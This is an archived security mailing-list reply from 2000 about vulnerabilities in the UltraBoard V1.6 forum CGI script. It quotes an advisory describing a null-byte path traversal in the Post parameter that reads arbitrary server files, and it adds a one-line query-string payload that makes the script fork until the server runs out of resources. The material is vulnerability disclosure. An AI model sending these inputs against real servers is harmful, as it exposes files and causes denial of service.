OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Fun with UltraBoard V1.6X
From: Juan M. Bello Rivas (jmbelloITCHY.COVERLINK.ES)
Date: Fri May 05 2000 - 16:10:56 CDT


Hola,

On Wed, May 03, 2000 at 02:13:16AM -0700, rudi carell wrote:
> found some interesting things in the "old" UltraBoard-Forum scripts
> (UltraBoard V 1.6)
>
> class:Input Validation Error
> remote:Yes
> vulnerable:UltraBoard V1.*
> vendor: www.ultrascripts.com || www.ub2k.com
>
> Description:
> By using the good old NullByte(\000) its possible to open "any" file on the
> webserver(with its permissions) running the "UltraBoard" forum-software.
>
> cgi-script:
> UltraBoard.pl || UltraBoard.cgi
>
> Variables:
> Action=PrintableTopic
> Post=[path_including_".."_to_any_file][***NULLBYTE***]
> Board=[valid_board]
> Idle=10
> Sort=0
> Order=Descend
> Page=0
> Session=

        There's even more fun availiable with old versions of ultraboard
(and I think the latest beta of ultraboard 2000 is also vulnerable to this).
        You can bring the web server to its knees by issuing a request to
the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

        It will start forking instances of the CGI until it eats all the
resources of the machine.

Later.

Juan M. Bello Rivas

--
"Let's suppose you just finished writing `zardoz',
 a program to make your head float from vortex to vortex."
			From GNU automake documentation.